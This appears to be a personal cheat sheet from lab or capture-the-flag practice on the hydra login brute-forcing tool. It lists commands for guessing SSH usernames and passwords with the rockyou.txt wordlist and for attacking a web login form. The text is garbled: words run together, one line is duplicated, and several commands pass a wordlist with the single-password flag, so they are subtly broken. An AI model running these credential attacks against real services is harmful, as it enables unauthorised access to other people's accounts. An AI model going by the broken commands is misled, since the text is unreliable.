[Services] hydra
Tools for guess login to services like SSH, FTP and RDP
Avaiable wordlists
/usr/share/wordlists/metasploit/usr/share/wordlists/rockyou.txtfor username
Basic usage
hydra -l <username> -p <password> <server> <service>Guess the username to linux machine
hydra -L users.txt -p butterfly 10.10.137.76 sshGuess the username to linux machine
hydra -L users.txt -p butterfly 10.10.137.76 sshGuess the password to linux machine
- Using
rockyou.txtas password
hydra -l root -p /usr/share/wordlists/rockyou.txt 10.10.137.76 sshSpecific threads
- Guess the
passwordto linux machine, and specific the number of threads to 4
hydra -l root -p /usr/share/wordlists/rockyou.txt 10.10.137.76 -t 4 sshSpecific HTTP post
- With action =
/loginPOST, and the input name isusernameandpassword. - Tell itβs wrong if
Your username or password is incorrect.appares on the website.
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
10.10.156.82 http-post-form \
"/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -VGuess ssh
hydra -l root -P /usr/share/wordlists/rockyou.txt 10.10.156.82 -t 4 sshLast updated on